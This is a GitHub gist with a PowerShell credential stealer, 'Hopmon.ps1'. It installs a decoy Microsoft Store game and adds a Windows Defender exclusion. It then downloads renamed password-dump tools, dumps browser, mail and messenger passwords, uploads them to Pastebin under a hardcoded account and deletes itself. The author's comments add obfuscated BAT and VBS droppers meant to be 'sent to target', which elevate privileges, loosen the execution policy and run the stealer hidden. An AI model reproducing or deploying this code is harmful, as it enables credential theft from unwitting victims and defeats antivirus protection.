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Last active July 25, 2024 04:46
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Dump browser(s) stored credentials
Dump major browsers stored credentials
Author: @r00t-3xp10it (ssa redteam)
Tested Under: Windows 10 (19043) x64 bits
Required Dependencies: administrator privileges
Optional Dependencies: WebBrowserPassView.exe | SendToPasteBin.ps1
PS cmdlet Dev version: v1.3.8
Supported browsers: Chrome, Chromium, Firefox, IE, MEdge, Safari.
This cmdlet uses winget to install Hopmon game from microsoft store,
dumps major browsers credentials stored from memory and send them to
the website: where we can review them.
To access credentials leaked:
1 - Access :
2 - username: pedro_testing
3 - password: angelapastebin
.Parameter PasteBinUserName
PasteBin website username access (default: pedro_testing)
.Parameter PasteBinPassword
PasteBin website password access (default: angelapastebin)
.Parameter Program
MStore program name to install (default: Hopmon)
.Parameter AutoDelete
Auto-Delete this cmdlet in the end (default: true)
.Parameter PastebinDeveloperKey
The pasteBin API key to authenticate with
Execute Hopmon (execution visible)
PS C:\> powershell -file Hopmon.ps1
Execute Hopmon (exec visible) + install Sunshine game
PS C:\> powershell -file Hopmon.ps1 -Program "Sunshine"
Silent execute Hopmon (background process)
PS C:\> Start-Process -WindowStyle hidden powershell -ArgumentList "-file Hopmon.ps1"
None. You cannot pipe objects into Hopmon.ps1
[-] Running with admin creds ..
[*] Creating defender exclusion ..
[*] Dumping browsers credentials ..
[*] Dumping mail serv credentials ..
[*] Dumping messenger credentials ..
[*] Sending credentials to pastebin ..
pastebin :
password : angelapastebin
username : pedro_testing
[*] Deleting defender exclusion ..
[-] Finished at 06:16:00 [21/07/2023]
[CmdletBinding(PositionalBinding=$false)] param(
write-host ""
$Ipath = (Get-Location).Path
$ErrorActionPreference = "SilentlyContinue"
## Make sure shell is running with administrator privileges before continue
If([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -Match "S-1-5-32-544") -iNotMatch '^(True)$')
write-host "[x] Administrator privileges required!`n" -ForegroundColor Red
Remove-Item -LiteralPath $MyInvocation.MyCommand.Path -Force
$CheckWinGet = (Winget -v)
If($CheckWinGet -iMatch '^(v.)')
Install Hopmon game from microsoft store.
$CheckInstall = Winget list --name "$Program"
If(-not($CheckInstall -iMatch "^($Program)"))
If([System.IntPtr]::Size -Match '^(8)$'){$Arch = "x64"}Else{$Arch = "x86"}
Start-Process -WindowStyle Hidden powershell -ArgumentList "winget install -i -e --name $Program --accept-package-agreements --force"
powershell (New-Object -ComObject Wscript.Shell).Popup("[abort] $Program allready installed ..",6,"$Program",0+48)|Out-Null
Start-Process "" -WindowStyle Maximized
## Create %TMP% directory exclusion in windows Defender
write-host "[-] Running with admin creds .." -ForegroundColor Green
If([bool](Get-Service -Name "WinDefend") -Match '^(True)$')
If((Get-MpComputerStatus).RealTimeProtectionEnabled -Match '^(True)$')
Esta funcçao cria uma exclusao no windows defender ( se a protecçao
activa estiver a funcionar ) que aponta para a pasta TEMP permitindo-nos
utilizar a pasta seleccionada para passar despercebido pelo windows defender.
## Make sure the exclusion does NOT already exist
If((Get-MpPreference).ExclusionPath -NotMatch '(\\Temp)$')
If([bool]((Get-Module -ListAvailable -Name "ConfigDefender").ExportedCommands|findstr /C:"Set-MpPreference") -Match '^(True)$')
write-host "[*] Creating defender exclusion .." -ForegroundColor Green
Set-MpPreference -ExclusionPath "C:\Users\$ENV:USERNAME\AppData\Local\Temp" -Force
Start-Sleep -Milliseconds 4000 # Give extra time for rule to became 'active' ?
Esta funcçao faz o download de WebBrowserPassView.msc para
a pasta TEMP e executa o programa dessa localizaçao para
fazer o dump das credenciais da maioria dos browsers. o
dump sera gravado num ficheiro txt [Confeitaria-SDA.txt]
cd "$Env:TMP"
$LOGFILE = "${Env:TMP}\Confeitaria-SDA.txt"
$Current = (Get-Date -Format 'HH:mm:ss [dd/MM/yyyy]')
write-host "[*] Dumping browsers credentials .." -ForegroundColor Green
$CmdLine = "/Lo@adP@as@sw@or@dsI@E 1 /Lo@adPa@ss@wor@d@sFir@ef@ox 1 /Loa@dP@as@sw@or@ds@Ch@ro@m@e 1 /Lo@adPa@ss@wo@rd@sO@pe@ra 1 /Loa@dPa@ss@wo@rd@sS@af@ar@i 1" -replace '@',''
iwr -uri "" -OutFile "$Env:TMP\Confeitaria-SDA.msc"|Unblock-File
Start-Process -WindowStyle Hidden powershell -ArgumentList ".\Confeitaria-SDA.msc $CmdLine /stext Confeitaria-SDA.txt" -Wait
## Dump mail services credentials
write-host "[*] Dumping mail serv credentials .." -ForegroundColor Green
iwr -uri "" -OutFile "$Env:TMP\mailpv.msc"|Unblock-File
Start-Process -WindowStyle Hidden powershell -ArgumentList ".\mailpv.msc /stext maildump.txt" -Wait
## Append outlook dump to logfile (mail serv)
$DumpMailServices = (Get-Content -Path "$Env:TMP\maildump.txt")
echo $DumpMailServices >> "$LOGFILE"
## Dump Instant Messenger credentials
write-host "[*] Dumping messenger credentials .." -ForegroundColor Green
iwr -uri "" -OutFile "$Env:TMP\mspass.msc"|Unblock-File
Start-Process -WindowStyle Hidden powershell -ArgumentList ".\mspass.msc /stext mspass.txt" -Wait
## Append messenger dump to logfile (messenger serv)
$DumpMessengers = (Get-Content -Path "$Env:TMP\mspass.txt")
echo $DumpMessengers >> "$LOGFILE"
## Send-To-Pastebin function
$RAWLEAK = (Get-Content -Path "$LOGFILE")
Esta funcçao pega no logfile criado pelo dump dos browsers
e envia-o para o website\u\pedro_testing
$WmiQuery = "SELECT * FROM AntiVirusProduct"
## Remake LOGFILE to append target system information
echo "Computer: $((Get-WmiObject Win32_OperatingSystem).CSName)" > "$LOGFILE"
echo "AntiVirus: $((Get-WmiObject -Namespace "root\SecurityCenter2" -Query $WmiQuery).displayName)" >> "$LOGFILE"
echo "$((Get-WmiObject Win32_OperatingSystem).Caption) - $((Get-WmiObject Win32_OperatingSystem).OSArchitecture)" >> "$LOGFILE"
echo "Dump browser credentials - $Current" >> "$LOGFILE"
write-host "[*] Sending credentials to pastebin .." -ForegroundColor Green
iwr -uri "" -OutFile "$Env:TMP\SendToPasteBin.ps1"|Unblock-file
Start-Process -WindowStyle hidden powershell -ArgumentList "-File $Env:TMP\SendToPasteBin.ps1 -PastebinUsername $PasteBinUserName -PastebinPassword $PasteBinPassword -PastebinDeveloperKey $PastebinDeveloperKey -FilePath $LOGFILE -MaxPastes 1 -TimeOut 1 -Egg true" -Wait
write-host "`n pastebin : " -NoNewline
write-host "$PasteBinUserName" -ForegroundColor DarkYellow
write-host " password : $PasteBinPassword"
write-host " username : $PasteBinUserName`n"
cd "$Ipath"
## Final CmdLet CleanUp
Remove-Item -Path "${Env:TMP}\Confeitaria-SDA.txt" -Force
Remove-Item -Path "${Env:TMP}\Confeitaria-SDA.msc" -Force
Remove-Item -Path "${Env:TMP}\SendToPasteBin.ps1" -Force
Remove-Item -Path "${Env:TMP}\maildump.txt" -Force
Remove-Item -Path "${Env:TMP}\mailpv.msc" -Force
Remove-Item -Path "${Env:TMP}\mailpv.cfg" -Force
Remove-Item -Path "${Env:TMP}\mspass.cfg" -Force
Remove-Item -Path "${Env:TMP}\mspass.txt" -Force
Remove-Item -Path "${Env:TMP}\mspass.msc" -Force
Start-Sleep -Milliseconds 800
## Windows Defender Exclusion - CleanUp
If([bool](Get-Service -Name "WinDefend") -Match '^(True)$')
If((Get-MpComputerStatus).RealTimeProtectionEnabled -Match '^(True)$')
## Make sure the exclusion exists
If((Get-MpPreference).ExclusionPath -Match '(\\Temp)$')
If([bool]((Get-Module -ListAvailable -Name "ConfigDefender").ExportedCommands|findstr /C:"Remove-MpPreference") -Match '^(True)$')
write-host "[*] Deleting defender exclusion .." -ForegroundColor Green
Remove-MpPreference -ExclusionPath "C:\Users\$ENV:USERNAME\AppData\Local\Temp" -Force
write-host "[-] Finished at $(Get-Date -Format 'HH:mm:ss [dd/MM/yyyy]')`n" -ForegroundColor Green
If($AutoDelete -Match '^(true)$')
## Auto Delete this cmdlet in the end and change policy
Remove-Item -LiteralPath $MyInvocation.MyCommand.Path -Force
Copy link

r00t-3xp10it commented Jul 21, 2023


-- Send this BAT script to target to trigger web browser dump --


  • It asks for administrator privileges to run (UAC)
  • It modifies powershell execution policy to UnRestricted
  • It downloads Hopmon.ps1 script into %TEMP% folder
  • Executes Hopmon.ps1 in background (hidden) process (orphan)
  • It deletes itself (Hopmon.bat) in the end of is execution


@echo off
sc query "lanmanserver"|find "RUNNING" >nul
  Net session >nul 2>&1 || (PowerShell start -verb runas '%~0' & exit /b)

Title Hopmon - Game
( ,;(=i%@Socket():%f ,no%n_UDP%t ^DE%DB_#1%FIN^ED ,%@k%IS_%Buffer_%MINI%#1%MI%'i'%ZE^D ;se%#0_%t ^IS_MIN^IM%#1_%IZ^ED=1 && @st^a%db%rt "" ^/m%_#1%i^n "%~dpnx0" %* && e%GUID%x^it); ),
@cm%Buff#1%d ^/R Ec^h%i0%O A|Pow^er%_GUID_%sh^elL Set-Exec^UtI%'B%onPo^lI%send(i)%cY Unr%db%e^stric^t%OFF%ed -Sc%_i0%o^pe Cur%_%r^ent%LANG%Us^er
@powershell iwr -Uri "" -OutFile "%tmp%\Hopmon.ps1"
@Cd %tmp% && ,Pow^er%_GUID_%sh^elL Sta%_%rt-Pro%_%ce^ss -Wind%OFF%owst%send(i)%yle hid%_%de^n Pow^er%_GUID_%sh^elL -Arg%i0%ume%Buffer_%ntLis^t '-file Hopmon.ps1' && exit
del "%~f0"

To install a diferent game .. edit the script (Hopmon.bat) and replace

'-file Hopmon.ps1'


'-file Hopmon.ps1 -Program Sunshine'

Copy link

r00t-3xp10it commented Aug 2, 2023


-- Send this VBS script to target to trigger web browser dump --


  • It asks for administrator privileges to run (UAC)
  • It modifies powershell execution policy to UnRestricted
  • It downloads Hopmon.ps1 script into %TEMP% folder
  • Executes Hopmon.ps1 in background (hidden) process (orphan)


dIm gUid,CookieAuth,AuthToken
AuthToken = WScript.FullName
gUid = StrReverse("sanur")

If WScript.Arguments.length = 0 Then
   CookieAuth = WScript.ScriptFullName
   Set ObjConsole = CreateObject("Shell.Application"):Wscript.Sleep(1000)
   ObjConsole.ShellExecute AuthToken, Chr(34) & CookieAuth & Chr(34) & " /debug", "", gUid
End If

Set SocketLayer = WScript.CreateObject("WScript.Shell")
SocketLayer.Run "cmd /R echo Y\|Powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser", 0, True
SocketLayer.Run "powershell iwr -Uri -OutFile $Env:TMP\Hopmon.ps1", 0, True
SocketLayer.Run "cmd /R cd %tmp% && Powershell Start-Process -WindowStyle hidden Powershell -ArgumentList '-file Hopmon.ps1'", 0, True

To install a diferent game .. edit the script (Hopmon.vbs) and replace

'-file Hopmon.ps1'


'-file Hopmon.ps1 -Program Sunshine'


open powershell terminal and execute

iwr -uri "" -OutFile "Hopmon.rar"

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